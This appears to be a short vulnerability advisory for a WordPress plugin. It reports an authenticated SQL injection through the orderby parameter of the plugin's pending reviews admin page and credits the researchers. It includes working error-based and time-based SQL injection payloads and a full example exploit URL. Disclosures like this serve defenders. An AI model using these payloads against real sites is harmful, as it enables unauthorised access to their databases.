The plugin does not properly validate the orderby GET parameter of the pending reviews page before using it in a SQL statement, leading to an authenticated SQL injection issue
error-based SQLI: orderby=id AND EXTRACTVALUE(4795,CONCAT(0x5c,0x717a627871,(SELECT (ELT(4795=4795,1))),0x7176707071)) time-based blind SQLI: orderby=id AND (SELECT 1339 FROM (SELECT(SLEEP(5)))Ozmh) https://example.com/wp-admin/admin.php?page=fp_admin_pending_reviews_page&order=asc&orderby=id+AND+%28SELECT+1339+FROM+%28SELECT%28SLEEP%285%29%29%29Ozmh%29
bl4derunner
Anton Sarsadskikh
Yes
2021-11-29 (about 5 months ago)
2021-11-29 (about 5 months ago)
2022-04-10 (about 1 months ago)